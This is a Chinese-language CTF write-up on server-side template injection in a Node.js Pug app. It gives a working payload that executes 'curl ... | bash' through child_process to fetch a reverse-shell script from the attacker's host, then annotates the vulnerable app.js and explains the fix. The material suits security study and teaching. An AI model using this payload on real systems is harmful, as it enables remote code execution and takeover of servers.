PUG模板SSTI

根据房间提示,是Nodejs的PUG模板SSTI

根据: https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection

尝试payload

#{7*7}

返回49，说明 `#{...}` 中的表达式在服务端被当作 JavaScript 求值，确认存在 SSTI（Pug 的插值/代码行可以执行任意 JS，因此可直接升级为 RCE）。在本地写好反弹 shell 脚本（即下面 payload 中的 s.sh），用 HTTP 服务器托管该脚本并开启监听，等待目标回连。

#{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('curl http://10.11.77.28:8000/s.sh | bash')}()}

拿到shell

app.js源码:

const express = require("express")
const pug = require("pug")
var bodyParser = require("body-parser")

// Application setup: Pug is the view engine used by res.render() below, and
// urlencoded body parsing makes req.body.template available to POST /render.
const app = express()
  .set("view engine", "pug")
  .use(bodyParser.urlencoded({ extended: true }))

// GET /: serves the fixed "index" view. No request data reaches the template,
// so nothing here is attacker-controlled.
app.get("/", (_req, res) => {
  res.render("index")
})

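// POST /render: compiles the caller-supplied `template` body field as Pug
// source and shows the resulting HTML through the fixed "render" view.
//
// SECURITY: `template` comes straight from the request body and is passed to
// pug.render() as TEMPLATE SOURCE, not as data. Pug interpolation (`#{...}`)
// and code lines are evaluated as JavaScript on the server, so this endpoint
// is a server-side template injection / RCE sink. The safe pattern is the one
// used on the last line: a fixed, server-owned template with untrusted input
// passed only as locals. The sink is kept here because this listing documents
// the vulnerable application.
app.post("/render", function (req, res) {
  // `const` replaces the original undeclared `template =` / `value =`
  // assignments, which created implicit globals (request data leaked into
  // global scope; a ReferenceError under 'use strict').
  const template = req.body.template || "h1 No template provided"

  // INJECTION POINT (flagged, not removed): equivalent to eval() on user input.
  const value = pug.render(template)
  res.render("render", { value: value })
})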

`value = pug.render(template)` 这里存在模板注入：`template` 直接来自 `req.body`，被当作 Pug 模板源码编译执行，而不是作为数据传入，因此模板中的 `#{...}` 表达式和代码行会在服务端以 JavaScript 执行。需要注意的是，问题并不在 `render` 函数本身，而在于把用户可控的字符串当作模板源码——紧接着的 `res.render("render", { value: value })` 使用的是固定的服务端模板文件，用户数据只作为变量（locals）传入并会被默认转义，这种用法是安全的。Express 应用中的 SSTI 基本都源于前一种模式；render 用于服务端渲染并将生成的 HTML 页面发送给客户端。